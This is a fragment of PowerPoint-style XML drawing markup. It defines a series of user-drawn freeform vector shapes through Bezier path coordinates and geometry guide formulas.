                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="70" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="66" y="42"/>
                      <a:pt x="67" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="46"/>
                      <a:pt x="75" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="67" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="57"/>
                      <a:pt x="64" y="58"/>
                      <a:pt x="65" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="65"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="66"/>
                      <a:pt x="87" y="64"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="99" y="61"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="57"/>
                      <a:pt x="103" y="57"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="58"/>
                      <a:pt x="104" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="87" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="68"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="75" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="68"/>
                      <a:pt x="72" y="68"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="39"/>
                      <a:pt x="71" y="39"/>
                      <a:pt x="71" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="100" y="41"/>
                      <a:pt x="100" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="101" y="40"/>
                      <a:pt x="100" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99"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Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6802" y="2978"/>
                <a:ext cx="3" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 3"/>
                  <a:gd name="T1" fmla="*/ 1 h 3"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 2 h 3"/>
                  <a:gd name="T4" fmla="*/ 0 w 3"/>
                  <a:gd name="T5" fmla="*/ 3 h 3"/>
                  <a:gd name="T6" fmla="*/ 1 w 3"/>
                  <a:gd name="T7" fmla="*/ 1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2" y="1"/>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="0" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="1" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="1"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>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Freeform 87"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6815" y="2978"/>
                <a:ext cx="4" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 2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2"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Freeform 88"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="203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7"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Freeform 89"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="3657"/>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Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2573"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Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2768"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6" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2965"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7" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3114"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Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3311" y="3657"/>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96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3460"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Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3609"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1" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30"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98"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3794" y="366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2" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4223"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1 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 240"/>
                  <a:gd name="T20" fmla="*/ 41 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 240"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 240"/>
                  <a:gd name="T26" fmla="*/ 41 w 63"/>
                  <a:gd name="T27" fmla="*/ 155 h 240"/>
                  <a:gd name="T28" fmla="*/ 41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1" y="26"/>
                      <a:pt x="41" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="84"/>
                      <a:pt x="41" y="84"/>
                      <a:pt x="41" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="103"/>
                      <a:pt x="34" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="124"/>
                      <a:pt x="41" y="136"/>
                      <a:pt x="41" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="46" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49"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3" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4330" y="3663"/>
                <a:ext cx="77" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 240"/>
                  <a:gd name="T2" fmla="*/ 42 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 240"/>
                  <a:gd name="T4" fmla="*/ 42 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 240 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 223 h 240"/>
                  <a:gd name="T10" fmla="*/ 17 w 63"/>
                  <a:gd name="T11" fmla="*/ 216 h 240"/>
                  <a:gd name="T12" fmla="*/ 22 w 63"/>
                  <a:gd name="T13" fmla="*/ 195 h 240"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 240"/>
                  <a:gd name="T20" fmla="*/ 22 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 22 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 240"/>
                  <a:gd name="T30" fmla="*/ 42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4" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4441"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Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4636"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6" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4833"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Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4982"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8" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5180" y="3657"/>
                <a:ext cx="82"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Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5330"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0" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5477"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3"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Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="567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2" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5824" y="3657"/>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3" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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4" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="616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Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="636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Freeform 113"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="655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7" name="Freeform 114"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="675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8" name="Freeform 115"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6897"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2" y="26"/>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Freeform 116"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7004" y="3663"/>
                <a:ext cx="78"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2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Freeform 117"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7116"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Freeform 118"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7311"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Freeform 119"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7509"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Freeform 120"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7657"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Freeform 121"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3990" y="3650"/>
                <a:ext cx="218" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209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1 w 179"/>
                  <a:gd name="T23" fmla="*/ 83 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 27 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 128 h 209"/>
                  <a:gd name="T30" fmla="*/ 152 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 151 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 165 w 179"/>
                  <a:gd name="T37" fmla="*/ 186 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 160 w 179"/>
                  <a:gd name="T41" fmla="*/ 153 h 209"/>
                  <a:gd name="T42" fmla="*/ 88 w 179"/>
                  <a:gd name="T43" fmla="*/ 72 h 209"/>
                  <a:gd name="T44" fmla="*/ 101 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 79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8 h 209"/>
                  <a:gd name="T84" fmla="*/ 86 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 77 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65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1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5"/>
                      <a:pt x="166" y="169"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="172"/>
                      <a:pt x="174" y="173"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="177"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="175" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="169" y="188"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="136" y="208"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="127" y="209"/>
                      <a:pt x="124" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="207"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="71" y="199"/>
                      <a:pt x="67" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="62" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="37" y="203"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="6" y="196"/>
                      <a:pt x="4" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="1" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="8" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="34" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="26" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="133"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="34" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="51" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="58" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="16"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="96" y="1"/>
                      <a:pt x="102" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
